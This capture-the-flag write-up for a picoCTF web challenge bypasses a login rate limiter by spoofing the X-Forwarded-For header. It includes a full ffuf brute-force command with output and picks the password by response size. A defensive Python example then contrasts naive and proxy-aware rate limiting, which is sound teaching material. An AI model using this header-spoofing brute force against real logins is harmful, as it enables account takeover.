As the challenge description says, the login endpoint is rate limited, and the hint tells us to read up on the X-Forwarded-For header. Rate limiters that key on this header trust whatever the client sends, so we simply add the header to our request with a proxy IP (I used Google's). I used ffuf to speed up the brute force, since it is faster than Burp Intruder for this.
```
ffuf -u http://amiable-citadel.picoctf.net:57519/login -H "Content-Type: application/json" -H "X-Forwarded-For: 203.0.113.195" -w passwords.txt:FUZZ -d '{"email":"ctf-player@picoctf.org","password":"FUZZ"}' -X POST -mc 200 -ac -t 50

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://amiable-citadel.picoctf.net:57519/login
 :: Wordlist         : FUZZ: /home/t4qi/CTFs/Platforms/PICO-CTF/WEB/Medium/crack_the_gate_2/passwords.txt
 :: Header           : Content-Type: application/json
 :: Header           : X-Forwarded-For: 203.0.113.195
 :: Data             : {"email":"ctf-player@picoctf.org","password":"FUZZ"}
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200
________________________________________________

KTxyUtJw                [Status: 200, Size: 17, Words: 1, Lines: 1, Duration: 206ms]
fFWxC3W6                [Status: 200, Size: 132, Words: 1, Lines: 1, Duration: 206ms]
jCzS5pSV                [Status: 200, Size: 17, Words: 1, Lines: 1, Duration: 205ms]
:: Progress: [20/20] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
```
The output of this command gives us three candidate passwords, all returning status 200. One of them has a much larger response size than the other two, which is the usual sign of a successful login among otherwise identical error responses, so I tried it and got the flag.
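To show the server-side root cause, here is an added example (not code from the challenge or from the picoCTF authors) with a minimal login rate limiter in two forms: one that keys on X-Forwarded-For as received, and one that only honours the header when the TCP peer is a trusted reverse proxy. The proxy address, limit and window are hypothetical values chosen for the demo.

```python
import time
from collections import defaultdict, deque

TRUSTED_PROXIES = {"10.0.0.5"}  # hypothetical reverse-proxy address (constructed)
LIMIT = 5                       # login attempts allowed per window
WINDOW = 60.0                   # window length in seconds


def client_ip_naive(remote_addr, headers):
    """Weak: the client picks its own identity by setting the header."""
    return headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()


def client_ip_hardened(remote_addr, headers):
    """Only trust X-Forwarded-For when the peer is a known proxy, then
    take the rightmost hop that is not itself a trusted proxy."""
    if remote_addr not in TRUSTED_PROXIES:
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed([h for h in hops if h]):
        if hop not in TRUSTED_PROXIES:
            return hop
    return remote_addr


class RateLimiter:
    """Sliding-window counter keyed by whatever key_fn returns."""

    def __init__(self, key_fn, now=time.monotonic):
        self.key_fn, self.now = key_fn, now
        self.hits = defaultdict(deque)

    def allow(self, remote_addr, headers):
        q, t = self.hits[self.key_fn(remote_addr, headers)], self.now()
        while q and t - q[0] > WINDOW:   # drop attempts outside the window
            q.popleft()
        if len(q) >= LIMIT:
            return False
        q.append(t)
        return True


def simulate(limiter, attempts):
    """One client (constructed peer address) sends `attempts` logins, changing
    the X-Forwarded-For value each time; returns how many were let through."""
    allowed = 0
    for i in range(attempts):
        hdr = {"X-Forwarded-For": f"203.0.113.{i % 200}"}
        allowed += limiter.allow("198.51.100.7", hdr)
    return allowed
```

When the header is not trusted, the 20 rotated requests collapse onto one key and only LIMIT of them pass; logging the real peer address next to the header value also makes this kind of spoofing easy to spot in access logs.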